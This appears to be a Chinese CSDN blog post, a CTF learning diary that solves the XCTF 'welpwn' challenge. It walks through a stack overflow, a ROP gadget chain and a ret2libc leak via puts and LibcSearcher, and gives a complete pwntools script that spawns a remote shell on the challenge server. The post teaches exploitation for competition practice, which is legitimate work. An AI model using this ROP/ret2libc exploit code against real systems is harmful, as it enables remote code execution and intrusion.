CTF学习日记----攻防世界pwn高手区welpwn

最新推荐文章于 2024-05-09 09:32:40 发布
最新推荐文章于 2024-05-09 09:32:40 发布
阅读量512 收藏 5
点赞数
分类专栏: pwn 文章标签: pwn python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44411509/article/details/109709112
版权

CTF学习日记----攻防世界pwn高手区welpwn

前言

本人CTF菜鸡一枚,今天也是第一次创作博客,今天做了一个ROP链的题目,特地记录一下,如有错误,还请各位大佬批评指正,侵删。

题目

在这里插入图片描述
题目没有任何提示,附件扔进kali看看
在这里插入图片描述
64位程序,开启NX保护。对于NX保护,我的理解是NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,这时就违反了NX,CPU就不干了,从而不能执行恶意指令。但是我们可以通过其他命令绕过NX保护,比如本题使用libc的函数暴露地址,从而获取系统函数地址,达到渗透。
附上常用保护机制介绍

linux程序的常用保护机制

IDA查看
在这里插入图片描述
主函数没什么问题,buf也没法溢出
溢出点在echo函数
在这里插入图片描述
可以看到参数a1就是buf,a1要复制给s2,s2只有16字节大小存在溢出。但是可以看到有判断条件 for ( i = 0; *(_BYTE *)(i + a1); ++i ),字符串复制遇到0时停止,这就意味着我们无法直接溢出修改返回地址,因为程序是64位包装的,所以当传入地址时必定会出现多个0,比如本题中main地址0x04007CD,传入的时候就变为0x0000000004007CD,前两个字节无法复制到s2,那么就不能传送有参数的函数,但是我们需要system(’/bin/sh’)因此需要进行绕过。这里的绕过方法就是ROP链绕过。

rop链攻击原理与思路
call和ret指令

对于ROP链绕过基本原理,我的理解就是伪装栈空间,我们知道在函数结束时通过pop和ret指令清空本函数栈空间,并恢复调用函数栈空间,这就给了我们操作的空间。我们可以在栈空间中人为的进行pop 和ret,伪装成函数结束,就可以进行跳转,你可能会问了?函数最后函数会pop和ret,提前人为进行有什么用处呢,实际上我们可以将ret指令的返回地址再次改为pop和ret那么我们就可以一直从栈空间向下寻找直到找到我们想要的数据为止。

栈内容栈所属变量
aaaaaaaas2
aaaaaaaas2
aaaaaaaaebp
aaaaaaaaecho返回地址
aaaaaaabuf
buf
_____main初始栈时ebp

根据IDA对s2栈空间的分析可知,echo的栈与主函数中的buf的栈空间相邻,虽然我们不能直接跳转到system(bin/sh)但是我们可以通过echo的返回地址进行多次的rop从而将栈指针指向buf中的某个字节中去,在其中写入地址和参数,如图所示。

栈内容栈所属变量
aaaaaaaas2
aaaaaaaas2
aaaaaaaaebp
pop_retecho返回地址
aaaaaaabuf
aaaaaaabuf
aaaaaaabuf
pop_ret
buf
_____main初始栈时ebp

我们知道当echo函数执行到结束时,将进行ret操作,ret实质上就是pop ip,那么pop_ret的地址就赋给了ip,此时栈指针指向buf第0字节,程序找到ip内容进行pop和ret操作,这时函数将buf的第0字节pop掉,之后进行ret,第一字节的内容将会作为下一条指令的地址执行。
但是,我们不能在第一字节里写入地址,因为s2复制时有不为零的条件,为了能够使s2顺利溢出到echo返回地址,buf的前24个必须为数据,那么在echo返回地址的内容就应该是pop4_ret,就是四次pop一次ret(前三次pop掉buf前24字节,第四次pop掉buf的25-32字节即pop4_ret这条指令),经过pop4_ret此时ip中的地址即为buf+32我们可以再次写入地址了,没有限制。如表进行写入:

栈内容栈所属变量
aaaaaaaas2
aaaaaaaas2
aaaaaaaaebp
pop4_retecho返回地址
aaaaaaabuf
aaaaaaabuf+8
aaaaaaabuf+16
pop4_retbuf+24
/bin/shbuf+32
system_addrbuf+40
buf
_____main初始栈时ebp

在此处我们将写入system地址和/bin/sh参数,由于64位程序中,当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。
当参数为7个以上时, 前 6 个与前面一样, 但后面的依次从 “右向左” 放入栈中,即和32位汇编一样。
所以我们需要进行pop rdi ;ret写入参数。这是整个答题思路。
注意vc和gc体系参数传递不同,这里讨论的是gc体系

64位汇编参数传递

通过以上思路分析,我们需要很多地址包括system_addr,bin_sh_addr,pop4_ret_addr,pop_rdi_addr。

ROPgadget --binary ./welpwn.elf --only 'pop|ret'

在这里插入图片描述

pop4_ret_addr=0x0040089c pop_rdi_ret_addr=0x004008a3

由于原函数中没有任何关于system和bin/sh的字符串,我们只能从libc下手。
首先需要确定libc的版本,常用的工具就是LibcSearcher,用法libc = LibcSearcher(“write”,write_real_addr)。

LibcSearcher安装使用

首先确定write_real_addr,我们可以利用pust函数将write_got作为参数进行打印,之后重新调用main_addr构建payload。

    payload = b"A"*(0x10+8)+p64(popx4_ret)
    payload = payload + p64(pop_rdi_ret) + p64(write_got) + p64(puts_plt)
    payload = payload + p64(main_addr)
    io.recvuntil('Welcome to RCTF\n')
    io.sendline(payload)

    print(io.recvuntil(b'A'*(0x10+8)))
    print(io.recv(3))

    write_addr=u64(io.recv(6).ljust(8,b'\x00'))

得到write_addr,从而获取ibc版本.
虽然我们不知道system_addr的真实地址,但是在Libc中system_addr与libc起始地址的偏移地址时相同的因此我们可以通过write_addr获取libc起始地址,从而计算出system_addr和bin_sh_addr。

# 自适应linc
    libc = LibcSearcher('write', write_addr)

    libc_addr = write_addr - libc.dump('write')
    system_addr = libc_addr + libc.dump('system')
    binsh_addr = libc_addr + libc.dump('str_bin_sh')

构建payload.

    payload = b'A' * (0x10 + 8) + p64(popx4_ret)
    payload = payload + p64(pop_rdi_ret) + p64(binsh_addr) + p64(system_addr)
    
    io.send(payload)
    io.interactive()

得到flag
在这里插入图片描述
参考链接:

http://www.peiqi.tech/posts/56979/#welpwn
https://blog.csdn.net/seaaseesa/article/details/102944448
https://blog.csdn.net/fastergohome/article/details/103724481

源代码:

# !/usr/bin/python3
# -*- coding: GB2312 -*-
'''
@文件        :welpwn_tx.py
@说明        :
@时间        :2020/11/13 21:10:02
@作者        :tx
@版本        :1.0
'''

from pwn import *
from LibcSearcher import *
context(os= 'linux', arch = 'amd64', log_level = 'debug')
content = 0
elf = ELF("./../攻防世界/pwn高手区/welpwn.elf")
write_got = elf.got["write"]
puts_plt=elf.plt["puts"]
main_addr = elf.symbols["main"]

popx4_ret=0x40089c # pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
pop_rdi_ret=0x4008a3 # pop rdi ; ret

if content == 1:
    io = process("./../攻防世界/pwn高手区/welpwn.elf")
else:
    io = remote("220.249.52.133", 53900)
def main():
    payload = b"A"*(0x10+8)+p64(popx4_ret)
    payload = payload + p64(pop_rdi_ret) + p64(write_got) + p64(puts_plt)
    payload = payload + p64(main_addr)
    
    io.recvuntil('Welcome to RCTF\n')
    io.sendline(payload)

    print(3)
    print(io.recvuntil(b'A'*(0x10+8)))
    print(io.recv(3))

    write_addr=u64(io.recv(6).ljust(8,b'\x00'))
    log.info("write_addr=>%#x",write_addr)
    # 自适应linc
    libc = LibcSearcher('write', write_addr)

    libc_addr = write_addr - libc.dump('write')
    system_addr = libc_addr + libc.dump('system')
    binsh_addr = libc_addr + libc.dump('str_bin_sh')

    payload = b'A' * (0x10 + 8) + p64(popx4_ret)
    payload = payload + p64(pop_rdi_ret) + p64(binsh_addr) + p64(system_addr)
    
    io.send(payload)
    io.interactive()
main()

总结

第一次写博客,感觉不要会用CSDN的编辑器,感觉写的还凑活吧,希望各位大佬多多批评指正,今天又是充实的一天呢!!!!!!QAQ

Geniotic
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
攻防世界 PWN 高手进阶 stack2 (write up)
qq_44768749的博客
08-18 413
攻防世界 PWN 高手进阶 stack2 (write up)stack20x01 查看保护机制0x02 查看反汇编0x03 利用过程修改返回地为system地址设置system函数的参数为'sh'exp stack2 该题利用未对数组边界进行检查,从而可以实现栈溢出 0x01 查看保护机制 32位 开启NX和canary 无PIE 0x02 查看反汇编 int __cdecl main(int argc, const char **argv, const char **envp) { int
[CTF-PWN]攻防世界新手村-hello_pwn[wp]
murongxuege的博客
10-01 2532
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 从描述中可以看出当前程序是要进行年龄的输入操作的,有输入操作,还是在新手村,那么大概率是gets()等C函数输入漏洞,进一步猜测是普通的内存地址覆盖的题。 che
攻防世界 适合做桌面_攻防世界pwn高手进阶(持续更新)
weixin_39615499的博客
12-22 270
dice_gameIDA看一下:这个和新手训练的guess_num一样都是猜数字,buf溢出改seed。:不多说了。唯一的问题是附件中给的libc.so.6我好像没法用,写的exp一直提示我Illegal instruction (core dumped),很迷。exp如下:from pwn import *from ctypes import *p = remote('111.198.29.45...
探索黑客艺术:welpwn —— 一键破解的利器
最新发布
gitblog_00009的博客
05-09 316
探索黑客艺术:welpwn —— 一键破解的利器 项目地址:https://gitcode.com/matrix1001/welpwn 在黑客世界中,编程技巧和漏洞利用的艺术并存。今天,我们要向您推荐一款能简化这一过程的强大工具——welpwn。它是一个自动化神器,让您的pwnning技巧如虎添翼。 项目简介 welpwn是为那些追求高效破解的开发者设计的,它的目标是为您处理繁琐的工作,让您专注于...
CTF学习日记(2)
NUC_zlt的博客
11-01 1195
CTF学习日记第二次总结
CTF日记】BUUOJ篇
CH3UHX9
03-11 592
[HCTF 2018]WarmUp 题目介绍 这道题来自BUUCTF,传送门。 涉及的知识点包括: PHP代码审计 远程文件包含 题目代码 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
CTF-Write-up:CTF撰写和信息
03-21
CTF-Write-up:CTF撰写和信息
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
welpwn pwn 入门题
02-11
pwn 入门题
攻防世界-pwnCTFM-Off_By_one漏洞与Tcachebin绕过
aptx4869_li的博客
11-19 1285
攻防世界-pwnCTFM-Off_By_one漏洞与Tcachebin绕过
栈迁移过程记录,栈指针rsp、rbp、rip、leave变化过程
qq_39153421的博客
03-11 6183
栈迁移 通过ROP leave_ret 改变ebp的值伪造栈,到达栈迁移的目的。下面就一个题目的一个payload进行调试,逐指令理解栈迁移的过程。这里只是通过ROP来实现,还有一种是通过ROP,向bss段伪造栈,这个以后再说。 stack=rbp-0x70 #指向当前栈顶 # ROPgadget --binary easy_ad --only "pop|ret" | grep rdi pop_rdi_ret=0x400953 fun_addr=0x400756 leave_ret=0x4007B5 pu
pwn的五道基础题
lllwky的博客
03-27 6574
文章目录一:ret2text1:服务器地址与端口号2:传入参数3:参数的接收范围4:找到bin/sh所在的地址二:your_nc三:overflow四:printf1:找到如何进入/bin/sh2:找到sth的地址3:获得格式化字符串的偏移量五:rop拓展: 一:ret2text from pwn import * context.arch="amd64" io=remote("101.34.90.86",10002) secure_addr=0x400852 payload=b"a"*0x10+b"a"*
【HUST】信息系统安全:系统调用介入作业,安全策略制定,编写简单的64位ret2libc攻击程序
weixin_45695828的博客
05-21 1272
本次实验内容: 针对第一次作业的代码,利用seccomp方法进行对程序进行约束,使得attacker只能将/tmp/flag的内容,向标准输出(STDOUT )进行输出,且只能输出 32 bytes的内容。 要求: 1. 实现上述约束方法; 2. 通过attack,验证上述约束方法的效果,attack包括:1)调用system函数创建shell(或直接调用execve,或调用其它系统调用);2)向其它目标输出内容(如:STDERR)、输出长度调整(超过32 bytes)。 虽然说...
push rdipop rdi,rep stosd作用
m0_49762339的博客
03-11 833
push rdi,pop rdi,rep stod
[攻防世界]-welpwn
m0_55906008的博客
12-05 543
pwn
CSAW2016之PWN题目tutorial的解法
HappyOrange2014的专栏
09-27 1974
每次做pwn题目都像破案一样,千头万绪,环环相扣,在凑齐所有线索之后一击致命,非常有意思。但毕竟初学,还需凭着这点兴趣继续努力!该题目是在64bit的linux运行的。用户可以选择3个选项,第一个选项会打印出puts函数的地址,第二个选项存在栈溢出,可以输入shellcode,第三个选项会退出程序。
攻防世界 pwn repeater
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于repeater题目,根据引用中提供的代码,该题目涉及到了远程攻击和内存溢出的技术。代码中使用了pwn工具包来进行远程连接和漏洞利用。通过发送一段恶意输入,攻击者可以覆盖程序的返回地址,使得程序执行恶意的shellcode。 具体地说,代码中通过发送一系列的输入,包括恶意shellcode,使得程序发生内存溢出,覆盖了主函数的返回地址,从而让主函数正常退出,并跳转到shellcode的首条指令处。 在此过程中,使用了pwn工具包中的一些功能,如远程连接、编码shellcode等。代码中也展示了一些具体的操作步骤,如发送输入、计算地址等。 综上所述,攻防世界中的pwn和repeater题目分别涉及到了漏洞利用和内存溢出的技术。通过精心构造的输入,攻击者可以利用程序的漏洞来执行恶意代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值